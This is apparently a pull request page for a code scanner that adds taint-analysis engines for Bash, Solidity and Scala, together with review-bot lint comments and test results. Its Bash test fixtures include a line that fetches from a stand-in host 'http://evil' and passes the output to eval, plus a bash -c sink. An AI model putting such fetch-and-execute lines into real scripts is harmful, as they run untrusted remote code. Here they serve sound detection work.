feat(taint): Scala/Solidity/Bash taint engines (→ 92.4%) #530
Wire three new language taint engines into the Semgrep taint bridge, mirroring the Ruby/PHP/C# templates and the shared taint_engine framework.

- bash_taint: command / command-substitution flow (top-level + functions); curl/jq/cat sources -> eval/bash -c/sh -c sinks; realpath sanitizer.
- solidity_taint: function-parameter (address) sources -> delegatecall (tainted receiver) and selfdestruct/suicide (tainted arg) sinks.
- scala_taint: request-parameter sources -> SQL string-building (infix / interpolated) and method-name (eval/execute/append/overrideSql) sinks.

Bridge (semgrep_taint.rs): thread Language through the pattern compiler; add compile_bash_pattern (shell command -> Call matcher) and a function-signature source compiler (-> any-parameter seed) for Solidity/Scala; strip Solidity statement-terminating `;`. Add to_*_spec/matcher, TaintFindingView::from_*, dispatch arms, and scala/solidity/bash/sh/shell/sol language detection. Update registry_coverage taint_language_supported.

Each engine has unit tests plus BRIDGE-LEVEL tests (parse_taint_rule -> Compiled -> check on a real vulnerable fixture fires; a safe near-miss does not), using the actual registry rule YAML shapes.

Registry coverage: 92.0% (1972) -> 92.4% (1982). Unblocks all 5 scala and 3 bash taint rules and 2 of 3 solidity (delegatecall, selfdestruct). The remaining basic-arithmetic-underflow is co-blocked: its source is a pattern-inside-only block that yields no expressible matcher.
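The source -> sink -> sanitizer shape described for bash_taint can be illustrated with a toy model. This is only a sketch under stated assumptions: `Stmt`, `Spec`, and `tainted_sinks` are hypothetical names invented for illustration, the statement forms are a drastic simplification of a real Bash AST, and nothing here is the PR's actual implementation.

```rust
use std::collections::HashSet;

/// Toy statement forms (hypothetical, not the PR's AST types).
#[derive(Debug, Clone, Copy)]
enum Stmt {
    /// `var=$(cmd "$arg")`: capture a command's output in a variable.
    AssignCmd { var: &'static str, cmd: &'static str, arg: Option<&'static str> },
    /// `cmd "$arg"`: run a command with a variable as its argument.
    Call { cmd: &'static str, arg: &'static str },
}

/// Hypothetical spec: command names acting as sources, sinks, sanitizers.
struct Spec {
    sources: &'static [&'static str],
    sinks: &'static [&'static str],
    sanitizers: &'static [&'static str],
}

/// Returns `(sink command, tainted variable)` pairs.
/// Flow-insensitive: statement order is ignored, so taint is propagated
/// to a fixed point over the whole statement list.
fn tainted_sinks(stmts: &[Stmt], spec: &Spec) -> Vec<(&'static str, &'static str)> {
    let mut tainted: HashSet<&'static str> = HashSet::new();
    loop {
        let mut changed = false;
        for stmt in stmts {
            if let Stmt::AssignCmd { var, cmd, arg } = *stmt {
                // Output of a source command is tainted outright.
                let from_source = spec.sources.contains(&cmd);
                // Otherwise taint passes through unless the command sanitizes.
                let from_arg = !spec.sanitizers.contains(&cmd)
                    && arg.map_or(false, |a| tainted.contains(a));
                if from_source || from_arg {
                    changed |= tainted.insert(var);
                }
            }
        }
        if !changed {
            break;
        }
    }
    stmts
        .iter()
        .filter_map(|stmt| match *stmt {
            Stmt::Call { cmd, arg } if spec.sinks.contains(&cmd) && tainted.contains(arg) => {
                Some((cmd, arg))
            }
            _ => None,
        })
        .collect()
}
```

With `curl` as a source, `eval` as a sink, and `realpath` as a sanitizer, the model reports `eval "$out"` after `out=$(curl ...)` but stays quiet when `out` is never assigned from a source or when the value passes through `realpath` first. Because the model ignores statement order, a variable that is tainted anywhere is treated as tainted everywhere, which is the usual trade-off of a flow-insensitive analysis.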
📝 Walkthrough
Three new intraprocedural, flow-insensitive taint analysis engines are added for Bash, Solidity, and Scala. Each engine is registered as a public module, integrated into the Semgrep YAML taint bridge (…

Changes
Bash / Solidity / Scala Taint Engine Addition
Sequence Diagram(s)
sequenceDiagram
rect rgba(173, 216, 230, 0.5)
Note over parse_taint_rule,compile_pattern: YAML Rule Parsing
participant parse_taint_rule
participant compile_matcher_list
participant compile_pattern
parse_taint_rule->>compile_matcher_list: pattern-sources/sinks/sanitizers + lang
compile_matcher_list->>compile_pattern: pattern text, role, lang
compile_pattern-->>compile_matcher_list: GenericMatcher::Call or ParamName
compile_matcher_list-->>parse_taint_rule: GenericSpec
end
rect rgba(144, 238, 144, 0.5)
Note over check_with_context,scala_taint: Runtime Dispatch
participant check_with_context
participant bash_taint
participant solidity_taint
participant scala_taint
check_with_context->>bash_taint: GenericSpec→TaintSpec, analyze_tree (Bash AST)
bash_taint-->>check_with_context: Vec<TaintFinding>
check_with_context->>solidity_taint: GenericSpec→TaintSpec, analyze_tree (Solidity AST)
solidity_taint-->>check_with_context: Vec<TaintFinding>
check_with_context->>scala_taint: GenericSpec→TaintSpec, analyze_tree (Scala AST)
scala_taint-->>check_with_context: Vec<TaintFinding>
end
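The runtime dispatch in the diagram can be sketched as a language tag lookup followed by a per-language match. This is a minimal illustration only: the tag list (scala/solidity/bash/sh/shell/sol) comes from the commit message, but the grouping of tags, the three-variant `Language` enum, and the `detect_language` and `engine_for` helpers are assumptions made for this example, not the bridge's real API.

```rust
/// Hypothetical subset of the language enum, limited to the three new engines.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
enum Language {
    Bash,
    Solidity,
    Scala,
}

/// Map a rule's language tag to a `Language` (assumed grouping of the tags
/// named in the commit message).
fn detect_language(tag: &str) -> Option<Language> {
    match tag {
        "bash" | "sh" | "shell" => Some(Language::Bash),
        "solidity" | "sol" => Some(Language::Solidity),
        "scala" => Some(Language::Scala),
        _ => None,
    }
}

/// Pick the engine module for a language; the returned string stands in for
/// the real dispatch arm that would call that engine's `analyze_tree`.
fn engine_for(lang: Language) -> &'static str {
    match lang {
        Language::Bash => "bash_taint",
        Language::Solidity => "solidity_taint",
        Language::Scala => "scala_taint",
    }
}
```

An exhaustive `match` on the enum means that adding a fourth language without a dispatch arm becomes a compile error rather than a silent fall-through.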
Estimated code review effort: 🎯 5 (Critical) | ⏱️ ~120 minutes
    }

    fn run(src: &str, spec: &TaintSpec) -> Vec<TaintFinding> {
        let tree = parse_file(src, Language::Bash).expect("parse");
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
    use crate::Language;

    fn run(src: &str, spec: &TaintSpec) -> Vec<TaintFinding> {
        let tree = parse_file(src, Language::Scala).expect("parse");
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
    assert_eq!(rule.lang, Language::Bash);

    let src = "out=$(curl http://evil)\neval \"$out\"\n";
    let tree = parse_file(src, Language::Bash).expect("bash fixture should parse");
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
    );

    let src = "out=\"ls -la\"\neval \"$out\"\n";
    let tree = parse_file(src, Language::Bash).expect("bash fixture should parse");
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
    );

    let src = "data=$(cat | jq -r '.path')\nbash -c \"$data\"\n";
    let tree = parse_file(src, Language::Bash).expect("bash fixture should parse");
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
        }
    }
    "#;
    let tree = parse_file(src, Language::Solidity).expect("solidity fixture should parse");
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
        }
    }
    "#;
    let tree = parse_file(src, Language::Solidity).expect("solidity fixture should parse");
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
        }
    }
    "#;
    let tree = parse_file(src, Language::Solidity).expect("solidity fixture should parse");
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
        }
    }
    "#;
    let tree = parse_file(src, Language::Scala).expect("scala fixture should parse");
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
        }
    }
    "#;
    let tree = parse_file(src, Language::Scala).expect("scala fixture should parse");
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
        }
    }
    "#;
    let tree = parse_file(src, Language::Scala).expect("scala fixture should parse");
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
    use crate::Language;

    fn run(src: &str, spec: &TaintSpec) -> Vec<TaintFinding> {
        let tree = parse_file(src, Language::Solidity).expect("parse");
foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)
.expect() can panic at runtime — use proper error handling with ? or match
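One way to act on the lint's suggestion is to have the helper return a `Result` and propagate with `?`. The sketch below is illustrative only: `parse_fixture` and `ParseError` are hypothetical stand-ins for the real `parse_file` and its error type (whose signatures are not shown on this page), and the "parse" step just counts lines. Since the flagged lines sit in test helpers, where a panic with a clear message is a common and accepted way to fail, keeping `.expect()` there is also a defensible choice.

```rust
use std::error::Error;
use std::fmt;

/// Hypothetical error type standing in for whatever `parse_file` returns.
#[derive(Debug)]
struct ParseError(String);

impl fmt::Display for ParseError {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        write!(f, "parse error: {}", self.0)
    }
}

impl Error for ParseError {}

/// Hypothetical stand-in for `parse_file`: rejects empty input and otherwise
/// returns the number of lines instead of a syntax tree.
fn parse_fixture(src: &str) -> Result<usize, ParseError> {
    if src.trim().is_empty() {
        Err(ParseError("empty fixture".to_string()))
    } else {
        Ok(src.lines().count())
    }
}

/// Helper that propagates the parse failure to the caller with `?`
/// rather than panicking via `.expect()`.
fn run(src: &str) -> Result<usize, Box<dyn Error>> {
    let line_count = parse_fixture(src)?;
    Ok(line_count)
}
```

A test that calls such a helper can itself return `Result<(), Box<dyn Error>>`, so a parse failure surfaces as a failed test with the error message rather than as a panic.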
Taint engines for Scala, Solidity, Bash → load rate 92.0% → 92.4%

Adds three new `mode: taint` engines, mirroring the existing ruby/php/csharp engines on the shared `taint_engine.rs` framework. Their tree-sitter grammars were already wired (rounds 7-8); these rules were blocked solely on a missing taint engine.

… pattern-inside-only source, not language-blocked; honest)

All three `mode: taint (unsupported language: …)` buckets → 0.

Results (independently re-measured)

Verification (re-run on the branch)

- `registry_coverage` → 92.4% / all three buckets gone ✓
- `cargo test` 1105 passed, 0 failed · clippy `-D warnings` clean · `fmt --check` clean · baseline + Cargo.toml untouched ✓
- `parse_taint_rule` → compiled `rule.check()` (the exact `scanner.rs:74` per-file entrypoint, NOT `analyze_tree`): curl-eval/scala-SQLi/delegatecall/selfdestruct fire on real registry rule patterns; safe near-misses (literal-only concat, delegatecall-to-self, clean eval) don't. API surface confirmed identical to the ruby template.